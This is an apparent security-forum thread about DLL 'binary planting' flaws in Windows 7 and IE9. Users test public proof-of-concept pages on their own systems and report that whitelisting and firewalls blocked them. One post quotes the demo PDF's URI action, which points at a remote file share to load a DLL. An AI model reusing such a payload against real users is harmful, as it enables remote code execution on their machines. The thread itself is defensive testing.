Unpatched DLL bugs let hackers exploit Windows 7 and IE9

http://www.computerworld.com/s/arti...ers_exploit_Windows_7_and_IE9_says_researcher

Looks interesting. Wish they release a POC.

 

It might be the same as was used before in the previous "binary planting" vulnerabilities revealed by the same security company. This is their old blog, and their test site. I'm not sure if the tests have been updated:

Binary Planting Attack Vectors
http://blog.acrossecurity.com/2010/09/binary-planting-attack-vectors.html

Online Binary Planting Exposure Tests
http://www.binaryplanting.com/test.htm

Binary Planting - Attack Vectors
http://www.binaryplanting.com/attackVectors.htm#demonstrations

It seems to be a pretty easy exploit to prevent, not only because of the many steps necessary to get the user to trigger it, but also because any security that blocks unauthorized executables (including DLLs) would snag it at the gate.

From the article:

regards,

-rich

 

So... one more against IE's Protected Mode? Security researchers keep finding ways to avoid it. Microsoft will then plug it. Security researchers will find one more hole to plug...

Microsoft should redesign IE's Protected Mode to work the same way as Chrome's does. Microsoft shouldn't feel ashamed for doing it, after all Google is only making use of Windows own security mechanisms.

It sure would become harder to be avoided (the sandbox).

 

@ Rmus

Thanks for the test links Don't remember doing them before, may have forgotten though as i've done that many

Anyway, i tried ALL the ones i could for XP & IE6, NONE worked

I don't have ANY updates for XP or IE6 either !

Here's a few test results



I know it's Wordpad not Word, but thought it "might" work

Not Adobe, but still

 

Hi, actually the word 'dll' in any exploit gets my imeediate attention.

 

Yes, you have to use the vulnerable applications, which is why I never got any of the POCs to work in 2010. The PDF wouldn't even open in my version 6 of the Adobe Reader. However, now I have a newer version and I see that the URI plugin cannot connect out automatically, as is also the case with Foxit that you show.

This is the code in the PDF:

Code:

URI(file:////www.binaryplanting.com/demo/windows_address_book)/S/URI

Not only that, if I allow the action, the firewall intercepts the outbound connection,
so the auto-infect threat fails on two counts:



Likewise, with the other attack vectors:

Binary Planting Through COM Servers
http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html

My version of MSWord isn't vulnerable and I don't use Powerpoint, so I set up my own test to see if a DLL could be loaded, and it cannot:



From the computerworld article:

Also, no go:



I submit that it doesn't matter what the triggering mechanism (remote code execution) is:
Unauthorized DLLs either can or cannot load. There is no in-between.

I'll be interested to see what new scenarios emerge at the conference, and whether or not
the presenters can show other attack vectors that would affect me. I hope some of the POCs
will work with me, because I'm interested to see how the outbound connection to a
remote server is made. If not by the browser via port 80, the firewall will alert as it did in their PDF POC.

regards,

-rich

 

Writing your own malware now Only kidding

Yeah, great isn't it

Me too, we'll see I feel confident though

 

If you are testing white listing security, you don't need a malware executable, just a non-whitelisted executable!

Note this attack scenario:

Binary Planting Through COM Servers
http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html

In my DLL test, I simulated a process to load and execute with a MSWord document, and I used the Win2K version of the of hmmapi.dll instead of the WinXP version. Not being on my computer's White List, the Win2K version cannot load and execute.

This preventative measure (White Listing) will not, of course, be discussed at the Black Hat Conference.

Too bad, because unless something changes, the outlook remains the same as last year:

Binary Planting Update, Day 7
Tuesday, August 24, 2010
http://blog.acrossecurity.com/2010/08/binary-planting-update-day-7.html

Accepting this dire pronouncement at face value that it is "the best possible workaround," I would feel almost helpless! How could I ever know that some product I'm using might be vulnerable!

However, in addition to the preventative measures I can employ at the point of attack, I've considered the steps involved to get me to the point of attack (as outlined in the computerworld article.) I wouldn't be inclined to be led that way in the first place.

For example, even though I opened the POC PDF file, in the real world, I wouldn't open a PDF from an unknown/untrusted source.

This is why I said that I'm interested in what is revealed at the Conference to see if other methods of attack have been devised/discovered that could trick me.

regards,

-rich

 

Sho nuff

That would spoil their fun

Exactly, and most people out there don't check to update their software.

Only for testing

Trick you That'll be the day

I'll be testing alongside you

 

Well, I'm not that complacent! The nature of evil is to trick the unaware, so I want to always be alert to new trickery.

Having said that, this year it's Win7 and IE9. Next year and the year after, it will be Win___ and IE___ (fill in the blanks)

Up until recently, a gloating response would have been, "Switch to Mac." Well, we are learning that even that isn't a sure thing (if it ever was). Member kareldjag several years ago wrote, (I paraphrase) that all code has the potential for malicious abuse. Who believed him?

The only answer for me has been to stay alert and be aware of the exploit attack methods to see if there is anything new (usually not) and to cover myself as best as possible, and let the cat-and-mouse games play themselves out!

regards,

-rich